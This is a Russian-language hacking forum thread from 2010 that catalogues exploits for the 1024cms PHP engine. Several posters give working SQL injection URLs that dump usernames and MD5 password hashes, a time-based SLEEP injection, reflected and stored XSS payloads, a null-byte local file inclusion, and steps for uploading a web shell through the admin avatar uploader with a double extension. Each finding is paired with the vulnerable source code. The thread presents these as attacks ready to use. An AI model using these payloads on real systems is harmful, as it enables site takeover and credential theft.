Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
13.03.2010, 21:20
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
1024cms
Сайт: www.1024cms.org
Префикс таблиц по умолчанию: otatf_
Алгоритм хеширования: md5($pass)
SQLi Движок просто кишит инъекциями и другими уязвимостями. Кстати, он отказывается работать при register_globals=on, это видимо у них предосторожность такая...) Поскольку в противном случае число уязвимостей удвоится.
В модуле форума:
Код:
http://localhost/1024/index.php?p=viewforum&id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((select+password+from+otatf_users+limit+0,1),floor(rand(0)*2)))--+
Уязвимая строчка в 1024\pages\viewforum\default\content.php:
PHP код:
...
$get_cat_type = mysql_query("SELECT * FROM ".$prefix."subcats WHERE id='".$id."'") or die("Cannot get category type: ".mysql_error());
...
В RSS: //Плин, теперь нагуглил, что бага старая, но пусть будет
Код:
http://localhost/1024/rss.php?t=vp&id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((select+password+from+otatf_users+limit+0,1),floor(rand(0)*2)))--+
Уязвимый участок \1024\rss.php:
PHP код:
...
else if ($_GET['t'] == "vp") {
$topic_id = $_GET['id'];
//Start RSS vars
$items = array();
$channel = array();
//Get topic
$get_tp = mysql_query("SELECT t.uid AS t_uid, t.title AS t_title, t.content AS t_content, t.date AS t_date, f.id AS f_id, f.name AS f_name, f.description AS f_descrip FROM ".$prefix."topics t, ".$prefix."subcats f WHERE t.id='".$topic_id."' AND f.id=t.tid") or die("Cannot get TP: ".mysql_error());
...
В различных служебных скриптах: //таких инъекций в этом движке, похоже, тучи, как и подобных скриптов
Код:
http://localhost/1024/pages/download/admin/ajax/sub/edit_sub_it.php?cat='+union+select+1,concat(username,0x3b,password)+from+otatf_users--+
Эта скуль очень приятная, запрос выполняется по циклу и выводятся все поля в теге <option>.
Уязвимый код в \1024\pages\download\admin\ajax\sub\edit_sub_it.ph p:
PHP код:
...
$get_cats = mysql_query("SELECT id, name FROM ".$prefix."downloadsub WHERE category='".$_GET['cat']."' ORDER BY weight ASC") or die("Cannot get cats: ".mysql_error());
...
<option value="<?php echo $cat['id']; ?>"><?php echo clean_smart($cat['name']); ?></option>
...
Код:
http://localhost/1024/pages/download/admin/ajax/sub/weight_sub.php?cat='+union+select+1,concat(username,0x3b,password),3+from+otatf_users--+
Такая же приятная скуль, выдаёт красивый список.
Уязвимый код в \1024\pages\download\admin\ajax\sub\weight_sub.php:
PHP код:
...
<?php
$get_cat = mysql_query("SELECT id, name, weight FROM ".$prefix."downloadsub WHERE category='".$_GET['cat']."' ORDER BY weight ASC") or die("Cannot get forums: ".mysql_error());
while($cat = mysql_fetch_array($get_cat)) {
?>
<li id="d_<?php echo $cat['id']; ?>"><?php echo $cat['name']; ?></li>
<?php } ?>
...
Код:
http://localhost/1024/pages/download/admin/ajax/sub/edit_sub_do.php?name=1&type=1&descrip&id=1'+and+sleep(10)--+
Что-то в этой инъекции в UPDATE у меня вывод не получился, туплю где-то, можно перебором ломать, например, со SLEEP().
Уязвимый код в \1024\pages\download\admin\ajax\sub\edit_sub_do.ph p:
PHP код:
...
mysql_query("UPDATE ".$prefix."downloadsub SET category='".$_GET['cat']."', name='".quote_smart($_GET['name'])."', description='".quote_smart($desc)."' WHERE id='".$_GET['id']."'")
...
Кстати у них в этих админских скриптах весьма оригинальная защита от доступа несанкционированного:
PHP код:
if($_SESSION['type'] !== '1' || $_GET['type'] !== '1') die("Incorrect Session");
Такая строчка там встречается очень часто, о чём думали разрабы, я не знаю.
CE В админке есть разные варианты заливки шелла, например, через файловый менеджер:
Код:
http://localhost/1024/admin/index.php?op=files
Последний раз редактировалось Root-access; 24.03.2010 в 00:25..
Причина: очепятка: не mq-on, а register_global=on
|
|
|
21.03.2010, 03:04
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Код:
echo "<br /><div align='center'><div class='plain_tables' style='width:90%; text-align:center'>".$_GET['confir']."</div></div>";
Пассивная XSS В скрипте pages\cinema\ajax  .Чет заблудился в коде я...).Переменная вообще не фильтруется.
ЗЫ: Рядом,кстати,красивый апдейтик в базу происходит...И длина строки передаваемой не фильтруется(а надо оно или нет не знаю).Можно забить базу чем-нибудь...Получится из этого что-нибудь ?) длина поля int(11)))) (выходит 44 байта максимум - 11 * 4)
ЗЫЗЫ: всё-таки последнее - имхо глупость)
Последний раз редактировалось Welemir; 21.03.2010 в 05:00..
|
|
|
|
21.03.2010, 04:54
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Забавную вещь нашёл в чате  .Не знаю,даже,как назвать - двойная xss,активная+пассивная,в общем,бред)):
http://localhost/1024/index.php?p=pm&t=send&u=
Вбиваем что-нибудь в поле Recipient(необязательно) и лицезреем всё увеличивающиеся куски хтмл кода.В поле Message получаем XSS при ставновлении окна активным )
Сдаётся мне,дело в этом:
PHP код:
<?php } if(isset($_GET['u']) && $_GET['u'] !== "") { ?>
<script type="text/javascript">
setTimeout("givemeausername()", 1000);
function givemeausername() {
document.getElementById('autocomplete').value = "<?php echo $_GET['u']; ?>";
}
setTimeout - функция ака таймер(или как системный таймер в NET),а задача любого такого таймера - выполнять процедуру в заданный промежуток времени ).Вот,она и выполняется - значению элемента с id autocomplete присваивается значение - как раз то,что мы передадим в GET переменной.В общем,весело .Всякий знает,что javascript можно менять на стороне клиента(жалею,что нету инструментов).Думаю,будет весело увидеть это со скоростью 10 мс ))))).
Код будет как раз в исходниках:
Код:
<script type="text/javascript">
setTimeout("givemeausername()", 1000);
function givemeausername() {
document.getElementById('autocomplete').value = "ТУТ";
}
</script>
Последний раз редактировалось Welemir; 21.03.2010 в 05:04..
|
|
|
|
22.03.2010, 21:55
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Активка:
/index.php?p=avatars&op=save&aid="><script>alert(); </script>&ses_token=ну ваш ses_token,
Потом в профайле срабатывает.
LFI:
Под админом надо быть.
/admin/index.php?op=../../../robots.txt%00
PHP код:
if(!isset($_GET['op']) || trim($_GET['op']) == "") $page = "home";
else $page = $_GET['op'];
strtolower($page);
if(isset($_SESSION['admin']) || $page == 'login') {
define("_AJAX_INCLUDE_", "./ops/".$page."/ajax/ajax.js");
include("./lang/".$lang."/".$page."/default.php");
Много искать не стал, на этом остановился |
|
|
|
22.03.2010, 23:51
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Пассивная XSS
Скрипт: /admin/index.php
Участок кода:
PHP код:
if(isset($_SESSION['admin']) || $page == 'login') {
define("_AJAX_INCLUDE_", "./ops/".$page."/ajax/ajax.js");
include("./lang/".$lang."/".$page."/default.php");
include("../includes/header.php");
include("./themes/".$admin_theme_dir."/templates/header.tpl");
include("./ops/".$page."/default.php");
include("./themes/".$admin_theme_dir."/templates/footer.tpl");
} [SIZE=2][COLOR=Red]else echo "<META http-equiv='refresh' content='0; URL=index.php?op=login&f=".urlencode($_SERVER['REQUEST_URI'])."'>"[/COLOR];[/SIZE]
Заливка шелла через аватары:
Скрипт:
PHP код:
http://localhost/1024/admin/index.php?op=avatars
Необходимо только сменить расширение файла на extension.evil ,где evil - расширение шелла,а extension - расширение файла,например,test.gif.php
Warning: В некоторых местах аплоада пофиксено,но там есть XSS ).
P.S.: Необходимы права админа.
ЗЫ: Аватары хранятся в папке /images/avatars/ директории /1024
Остальное в пути ).За кривое оформление заранее извиняюсь,ибо не умею.
Вот вся функция upload(),которая взаимодействует со скриптом аплоада аватара,кому интересно:
PHP код:
function upload() {
global $admin_theme_dir;
if(!isset($_FILES['upload']) || trim($_FILES['upload']['tmp_name']) == "") echo "<meta http-equiv='refresh' content='0;URL=index.php?op=avatars'>";
else {
echo "<div align='center'>";
include("../includes/classes/uploading.php");
$upload = $_FILES['upload'];
$tmp_name = $_FILES['upload']['tmp_name'];
$name = $_FILES['upload']['name'];
$filepath = "";
if(is_uploaded_file($tmp_name)) {
if($_FILES['upload']['error'] == UPLOAD_ERR_OK) {
$path = "../images/avatars/";
if(!is_dir($path)) die("Cannot find path: ".$path);
if(preg_match('(\.gif|\.png|\.jpg|\.jpeg)', $name)) {
$name = $_FILES['upload']['name'];
$filepath = $path.$name;
if(file_exists($filepath)) die("Avatar already exists, rename the image and try again");
if(move_uploaded_file($tmp_name, $filepath)) {
define("_REDIRECT_", "./index.php?op=avatars");
define("_CONTENT_", _CONFIRMED_);
include("./themes/".$admin_theme_dir."/templates/successfulprocess.tpl");
} else die("Cannot upload file, please try again");
} else die("File Type not allowed. You can upload: .gif, .png, .jpg, .jpeg");
} else echo "ERROR:".file_error_check($_FILES['upload']['error']);
} else die("Error uploading file");
}
echo "</div>";
}
Последний раз редактировалось Welemir; 23.03.2010 в 00:24..
|
|
|
|
23.03.2010, 00:53
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Sql injection
Скрипт:
PHP код:
http://1024/admin/ops/email/default.php
Обиженный параметр: id.Буквально в каждой функции(add,reply и т.д.).Наверное,это объясняется тем,что фильтрация там не нужна...в плане того,что админ акками никто не бросается ).
Активная XSS
Не помню,в каком скрипте,где-то на индексной странице скрипта /admin/index.php
Прописывать код там,где выводится надпись по умолчанию: Sorry our site is currently offline for maintenance
Последний раз редактировалось Welemir; 23.03.2010 в 01:06..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
